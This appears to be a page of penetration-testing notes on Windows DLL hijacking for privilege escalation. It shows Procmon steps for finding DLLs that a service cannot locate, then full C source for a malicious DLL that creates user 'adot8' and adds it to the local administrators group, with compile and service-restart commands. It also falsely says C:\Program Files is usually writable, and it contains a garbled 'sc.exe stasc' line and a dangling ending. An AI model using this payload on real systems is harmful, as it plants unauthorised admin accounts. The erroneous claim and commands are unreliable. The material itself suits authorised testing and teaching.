DLL Hijacking

Overview

Dynamic Link Libraries are like executables but they aren't directly executable. They are shared libraries that contain functions, classes, resources, variables etc and they often run with executables.

When a Windows applications or services start up they look for their DLLs to run with.However if the DLL they're looking for doesn't exist or is missing AND the path to it is writable then we can get malicious with it.

Escalation via DLL Hijacking

Simulation Steps:

  • List running services and find one that sticks out

Get-CimInstance -ClassName win32_service | Select
Name,State,PathName | Where-Object {$_.State -like 'Running'}

  • Spin up Procmon

  • Filter menu > Filter > Process Name > is > <service binary>

  • Add filter of "Result is NAME NOT FOUND then Include"

  • Add filter of "Path ends with .dll then Include"

  • Restart the service

  • This will show all of the NAME NOT FOUND for DLLs

  • We can exploit this if the location of the non existing DLL is writable

  • C:\Program Files is usually writable

  • Start service and see if it's looking for a DLL to a writable path

  • After ones been found can put a fake DLL there make it call to a malicious executable and pop a shell

In this case we can compile a malicious dll payload from a c program and make the dll add the user we're using the the local admin group or pop a shell

#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i;
i = system ("net user adot8 password123! /add");
i = system ("net localgroup administrators adot8 /add");
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
 x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Save to the writable location and restart service

sc.exe stasc stop dllsvc
sc.exe start dllsvc

OR

$env:Path
PreviousKernel ExploitsNextService Permissions

Last updated